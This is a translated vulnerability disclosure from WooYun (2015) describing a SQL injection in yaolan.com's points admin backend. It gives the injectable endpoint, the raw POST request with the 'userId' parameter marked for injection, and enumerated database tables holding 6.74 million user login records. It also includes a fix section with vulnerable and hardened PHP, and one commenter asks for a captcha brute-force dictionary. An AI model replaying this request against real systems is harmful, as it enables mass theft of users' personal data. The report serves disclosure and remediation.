MySQL injection on a 摇篮网 (yaolan.com) site (involving a large amount of user data)

ID: 118883
URL: http://www.wooyun.org/bug.php?action=view&id=118883
Status: Confirmed by vendor
Title: MySQL injection on a 摇篮网 (yaolan.com) site (involving a large amount of user data)
Type: SQL injection
Vendor: 摇篮网 (yaolan.com)
White hat: lijiejie
Submitted: 2015-06-07 21:26:00
Disclosed: 2015-07-23 17:22:00
Fix time: (not set)
Confirmed: 2015-06-08 00:00:00
Confirm spend: 1
Tags:
Followers: 0
Favorites: 0
White hat rating:
Self-assessed rank: 15
Vendor rating:
Vendor rank: 20
Summary
MySQL injection on a 摇篮网 site; 6.74 million user records can be dumped. The database holds user passwords, email addresses, mobile numbers, QQ numbers and other personal details.
Details

The injection point is in the admin backend at http://jifen.yaolan.com/admin.php?r=site/login (the `userId` POST parameter of the `GetUserCoin` action):

POST /admin.php?r=site/GetUserCoin HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jifen.yaolan.com
Cookie: PHPSESSID=eqffbvsjk3ardoggo834p3g3v5
Host: jifen.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userId=*

POC

current user:    '[email protected]%'
current database: 'user_yaolan_com'
Database: user_yaolan_com
[31 tables]
+-------------------------+
| BoroughList |
| ChildInfo |
| ChildInterestDetailList |
| ChildInterestInfo |
| ChildInterestList |
| CityList |
| CoinInfo |
| CountryList |
| EducationList |
| GeekList |
| GradeList |
| IncomeList |
| LoginInfo |
| MarkInfo |
| NoDefaultChildInfo |
| ProfessionList |
| ProvinceList |
| TradeList |
| UserBaseInfo |
| UserExtInfo |
| UserGeekDetail |
| UserInterestDetailList |
| UserInterestInfo |
| UserInterestList |
| UserSignature |
| UserSource |
| UserVerifyDetail |
| VerifyList |
| iur_child_birth_based |
| sysdiagrams |
| word_filter_reg |
+-------------------------+
Database: user_yaolan_com
+-----------+---------+
| Table | Entries |
+-----------+---------+
| LoginInfo | 6741020 |
+-----------+---------+


The LoginInfo table contains user passwords; the UserBaseInfo and UserExtInfo tables hold users' profile data: email addresses, mobile numbers, QQ numbers, postal addresses and so on.
As a test, the 10 records from offset 1,000,000 to 1,000,010 were retrieved, shown below (the values are masked in the published report):



Fix

Validate and filter the parameter (type-check `userId` and pass it to MySQL as a bound parameter rather than concatenating it into the query).
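To illustrate that fix, here is an added example written for this page (not the vendor's code): the string-concatenation pattern that makes a `userId` parameter injectable, beside a hardened handler that validates the type and binds the value. The CoinInfo column names, the PDO connection and the function names are assumptions; only the table name, the route and the parameter name come from the report.

```php
<?php
// Added example, not the vendor's code. Column names (coin, userId) and the
// DSN are hypothetical; CoinInfo is the table name listed in the report.

// Vulnerable pattern (shown for contrast): the raw POST value is spliced into
// the SQL text, so whatever the client sends in userId is parsed as SQL.
function getUserCoinVulnerable(PDO $db, array $post): ?array
{
    $sql = "SELECT coin FROM CoinInfo WHERE userId = " . ($post['userId'] ?? '');
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened handler: reject anything that is not a positive integer, then bind
// the value so the database never interprets client input as SQL.
function getUserCoin(PDO $db, array $post): ?array
{
    $userId = filter_var(
        $post['userId'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($userId === false) {
        http_response_code(400);   // malformed or missing userId
        return null;
    }
    $stmt = $db->prepare('SELECT coin FROM CoinInfo WHERE userId = :id');
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection with server-side prepares enforced; emulated prepares would make
// PDO build the query string client-side and weaken the guarantee above.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=user_yaolan_com;charset=utf8mb4',   // assumed DSN
    'app_user',                                                      // placeholder
    'app_password',                                                  // placeholder
    [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);

header('Content-Type: application/json');
echo json_encode(getUserCoin($db, $_POST));
```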

Status history
2015-06-07: Details sent to the vendor; awaiting vendor response
2015-06-08: Vendor confirmed; details visible to the vendor only
2015-06-18: Details disclosed to core white hats and domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public
Vendor reply: Vulnerability confirmed, fix in progress. Thanks to the WooYun white hat for the report.
Response: Severity: High; Rank: 20; Confirmed: 2015-06-08 17:21
Comments (content / commenter / likes / time)

@天地不仁 以万物为刍狗 Could I get a captcha brute-force dictionary?

牛 小 帅 / 0 / 2015-06-08 10:21:00

@天地不仁 以万物为刍狗 I thought you two were working together @lijiejie

茜茜公主 / 0 / 2015-06-07 21:57:00

Damn, why hasn't mine been reviewed? Mine was submitted first. Is this a duplicate? @疯狗 @浩天 http://www.wooyun.org/bugs/wooyun-2015-0118715/trace/77bfdaa5d372b23bb1994d107aa4a37b

天地不仁 以万物为刍狗 / 0 / 2015-06-07 21:34:00